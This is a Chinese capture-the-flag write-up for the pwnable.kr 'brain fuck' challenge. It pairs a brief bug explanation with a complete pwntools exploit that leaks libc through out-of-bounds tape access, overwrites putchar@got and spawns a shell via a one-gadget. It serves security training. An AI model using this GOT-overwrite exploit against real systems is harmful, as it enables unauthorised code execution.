pwnable.kr 之 brain fuck

brain fuck,类似vm吧,可以进行读写,移位,加减操作。

所以移位操作和读写操作结合起来其实就是任意地址写,且got表可写。

思路:

先通过任意地址读,读取got表上的libc地址,然后通过任意地址写将putchar@got修改为main,返回到main函数。

第二次输入的时候修改putchar@got为onegadget即可

#coding:utf-8

# from libformatstr import FormatStr
# py64 = FormatStr(isx64=1)
# py64[printf_got] = onegadget
# sl(py64.payload(start_read_offset))
from pwn import *
import sys

# Target selection: local == 0 talks to the challenge service, any other
# value runs ./bf under pwntools' process().  Both branches load ./bf as
# `elf`; only the libc source differs (the process's own libc vs. the
# bundled ./bf_libc.so), which is what the symbol offsets below depend on.
local = 0
context.terminal=['tmux','splitw','-h']
# Passing DEBUG/debug as the sole argv[1] turns on pwntools' hexdump of all traffic.
if len(sys.argv) == 2 and (sys.argv[1] == 'DEBUG' or sys.argv[1] == 'debug'):
    context.log_level = 'debug'

if local:
    p = process('./bf')
    elf = ELF('./bf')
    libc = elf.libc
    # p = process(argv=['',pay])
    # p = process(["/lib/ld-linux.so.2","./bf"],env={"LD_PRELOAD":"./bf_libc.so"})
else:
    p = remote("pwnable.kr","9001")
    elf = ELF('./bf')
    libc = ELF('./bf_libc.so')

#内存地址随机化
def debug(addr=0,PIE=True):
    """Attach gdb to the live target `p` with a breakpoint at *addr*.

    With PIE=True, *addr* is treated as an offset and rebased onto the
    first mapping that `pmap <pid>` reports (the text base); otherwise it
    is used as an absolute address.  Uses the module-level `p` and the
    `os`/`gdb` names that come in via the pwn star-import.
    NOTE(review): the printed "breakpoint_addr" uses a fixed 0x202040
    offset rather than *addr*, so it does not reflect the breakpoint set.
    """
    if not PIE:
        gdb.attach(p, "b *{}".format(hex(addr)))
        return
    mappings = os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()
    text_base = int(mappings[1], 16)
    print("breakpoint_addr --> " + hex(text_base + 0x202040))
    gdb.attach(p, 'b *{}'.format(hex(text_base + addr)))

# Short aliases around the pwntools tube `p`; each returns whatever the
# underlying tube method returns.
def sd(s):
    """Send raw data."""
    return p.send(s)


def rc(s):
    """Receive up to *s* bytes."""
    return p.recv(s)


def sl(s):
    """Send data followed by a newline."""
    return p.sendline(s)


def ru(s):
    """Receive until the delimiter *s* has been seen."""
    return p.recvuntil(s)


def sda(a, s):
    """Wait for *a*, then send *s*."""
    return p.sendafter(a, s)


def sla(a, s):
    """Wait for *a*, then send *s* plus a newline."""
    return p.sendlineafter(a, s)

def leak(name,addr):
    """Log *addr* in hex under the label *name* through pwntools' log.info."""
    label = name + " --> %s"
    log.info(label, hex(addr))

# Stage 1: leak a libc pointer, then redirect execution back to a fixed
# address.  Root cause, as the writeup states: the interpreter lets the
# tape pointer leave its buffer ('<'/'>' are unchecked), so ','/'.' become
# an out-of-bounds write/read, and the GOT is writable.  A bounds check on
# the tape pointer and full RELRO (read-only GOT) are the defensive fixes.
binsh = 0x804a0a0  # NOTE(review): assigned but never referenced below
pay = ''
pay += ',>'*8 #getchar  # read 8 bytes into the tape; filled by "/bin/sh\x00" below
pay += '<'*8            # back to the tape start
pay += '<'*0x78         # then 0x78 cells before it; which GOT slot this is comes from the binary, not verified here
pay += '.>'*4 #putchar  # emit 4 bytes from start-0x78: read back as `setvbuf` below
pay += '>'*4            # now at start-0x70
pay += ',>'*4 #getchar  # overwrite 4 bytes at start-0x70 with p32(0x08048671) below
pay += '.'              # one more output call; per the writeup this slot is putchar@got, so this transfers control
#gdb.attach(p,"b *0x08048774")
sla("[ ]\n",pay)
pause()                 # pwntools pause(): waits for a keypress before continuing
sd("/bin/sh\x00")       # exactly 8 bytes, matching the 8 getchar calls
pause()
sd(p32(0x08048671))     # the writeup says this is main; not verifiable from this script

# One-gadget offsets are specific to the libc build; only one[4] is used.
#one = [0x3ac6c,0x3ac6e,0x3ac72,0x3ac79,0x5fbd5,0x5fbd6] #local
one = [0x3ac5c,0x3ac5e,0x3ac62,0x3ac69,0x5fbc5,0x5fbc6,] #remote
# Assumes the 4 leaked bytes are setvbuf@got; libc_base is only right if
# that assumption and the ./bf_libc.so symbol table both match the target.
setvbuf = u32(rc(4))
libc_base = setvbuf - libc.sym['setvbuf']
onegadget = libc_base + one[4]
system = libc_base + libc.sym['system']  # NOTE(review): computed but unused
leak("libc_base",libc_base)
#leak("memset",memset)
#leak("system",system)
leak("onegadget",onegadget)

# Stage 2: same slot (start-0x70) is overwritten again, this time with the
# computed gadget address, and the trailing '.' triggers it.
pay = ''
pay += '<'*0x70
pay += ',>'*4
pay += '.'
#gdb.attach(p,"b *0x08048648")
sla("[ ]\n",pay)
pause()
sl(p32(onegadget))      # sendline appends '\n' beyond the 4 bytes the payload reads
p.interactive()